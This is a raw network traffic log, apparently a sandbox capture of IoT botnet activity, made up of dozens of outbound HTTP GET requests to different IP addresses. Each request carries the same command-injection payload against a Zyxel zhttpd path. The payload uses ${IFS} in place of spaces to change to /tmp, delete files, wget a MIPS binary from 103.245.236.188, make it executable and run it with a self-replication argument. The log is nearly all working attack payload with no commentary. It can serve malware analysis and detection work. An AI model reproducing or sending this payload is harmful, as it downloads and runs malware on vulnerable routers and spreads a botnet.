                                                Jan 12, 2024 18:16:30.629036903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6332192.168.2.2356432145.125.227.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629086971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6333192.168.2.235289646.8.73.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629132032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6334192.168.2.2337324174.37.125.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629179955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6335192.168.2.234349688.94.128.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629216909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6336192.168.2.2350118194.99.12.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629256010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6337192.168.2.234048218.181.146.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629306078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6338192.168.2.2334266167.253.68.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629358053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6339192.168.2.2350744168.98.247.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629381895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6340192.168.2.233986260.64.61.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629431963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6341192.168.2.2359182109.112.155.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629453897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6342192.168.2.2359164131.74.34.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629489899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6343192.168.2.2333208138.250.164.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629528046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6344192.168.2.2360478203.41.122.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629584074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6345192.168.2.234153858.242.138.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629587889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6346192.168.2.2338052144.222.125.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629618883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6347192.168.2.2336468124.145.145.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629648924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6348192.168.2.233705247.72.255.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629731894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6349192.168.2.2349618152.7.35.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629759073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6350192.168.2.2341750131.160.45.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629816055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6351192.168.2.23415388.227.103.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629857063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6352192.168.2.23434445.159.62.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629905939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6353192.168.2.2358216206.37.58.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629933119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6354192.168.2.2346142119.98.176.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.629980087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6355192.168.2.2359074155.176.128.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630016088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6356192.168.2.2335410114.220.230.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630059958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6357192.168.2.2351868173.253.249.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630099058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6358192.168.2.23597122.82.242.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630155087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6359192.168.2.2347926117.102.144.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630219936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6360192.168.2.235699449.233.40.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630239964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6361192.168.2.2352466184.121.170.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630285978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6362192.168.2.2355378185.171.223.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630310059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6363192.168.2.2343364125.191.179.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630362034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6364192.168.2.235015058.114.96.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630395889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6365192.168.2.2355902199.98.96.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630429983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6366192.168.2.235803842.112.129.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630465031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6367192.168.2.2351506100.46.116.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630511999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6368192.168.2.236038274.237.141.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630544901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6369192.168.2.2342318166.74.242.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630570889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6370192.168.2.235815640.69.209.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630600929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6371192.168.2.2356404178.185.166.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630637884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6372192.168.2.234108438.139.63.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630676985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6373192.168.2.2337408194.109.160.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630724907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6374192.168.2.235135699.209.104.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630769014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6375192.168.2.235884035.90.30.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630806923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6376192.168.2.2349372217.162.52.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630836964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6377192.168.2.234359090.207.66.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630892992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6378192.168.2.2344256106.251.29.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.630924940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6379192.168.2.235317043.48.125.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.640984058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6380192.168.2.2352268213.215.19.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641026974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6381192.168.2.2351196210.195.184.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641129017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6382192.168.2.2360734208.160.111.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641158104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6383192.168.2.2360558131.98.62.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641186953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6384192.168.2.2339624101.89.237.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641252995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6385192.168.2.2351322204.91.68.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641319036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6386192.168.2.2341840212.247.28.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641351938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6387192.168.2.2346790137.111.11.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641369104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6388192.168.2.234040231.206.209.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641426086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6389192.168.2.2342086124.218.49.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641453981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6390192.168.2.23361409.226.191.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641505003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6391192.168.2.2346476126.160.75.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641541004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6392192.168.2.2354764175.115.98.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641586065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6393192.168.2.233530820.98.197.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641633034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6394192.168.2.235423663.91.159.126443
                                                TimestampBytes transferredDirectionData
